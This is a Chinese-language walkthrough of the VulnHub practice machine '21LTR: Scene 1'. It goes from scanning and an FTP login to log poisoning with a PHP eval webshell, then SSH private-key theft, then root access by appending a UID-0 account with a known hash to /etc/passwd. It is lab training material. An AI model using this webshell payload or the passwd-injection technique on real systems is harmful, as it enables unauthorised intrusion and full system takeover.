下载

下载地址：https://www.vulnhub.com/entry/21ltr-scene-1,3/

导入靶机

一直按默认的来，一直下一步

修改网卡

修改靶机和 kali 攻击机网络模式为仅主机模式

把仅主机模式的 IP 修改为 192.168.2.0

信息收集

主机发现

arp-scan -l

靶机 IP 是 192.168.2.120

端口扫描

nmap -p- 192.168.2.120

目录扫描

python3 dirsearch.py -u "192.168.2.120"

访问 web

查看页面源代码，发现账号和密码

尝试ssh连接没成功，但是ftp连接成功了，ls查看，发现只有一个文件

ftp 192.168.2.120
logs								# 账号
zg]E-b0]+8:(58G			# 密码

下载下来

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

拼接到刚才扫描到的 logs 目录下，发现可以访问到日志文件 /logs/backup_log.php

上传一句话木马

尝试在日志文件写入木马，参考了一下其他文档，需要利用10001端口

telnet 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看一下敏感文件

因为有ssh服务，就读取一下密钥，把密钥下载下来拖进 kali 桌面

/media/USB_1/Stuff/Keys/id_rsa

赋予权限,然后ssh登录

chmod 600 id_rsa
ssh -i id_rsa hbeale@192.168.2.120

要是有这个报错的话（sign_and_send_pubkey: no mutual signature supported）

将一下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

提权

查看用户文件

cat /etc/passwd

另起一个终端

openssl passwd 123456

用 $1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3. 替换 root:x:0:0::/root:/bin/bash 中的 x

并新起一个名字 newt

newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash

把它写入/etc/passwd

echo 'newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash' >> /etc/passwd
cat /etc/passwd

提权成功

su newt
123456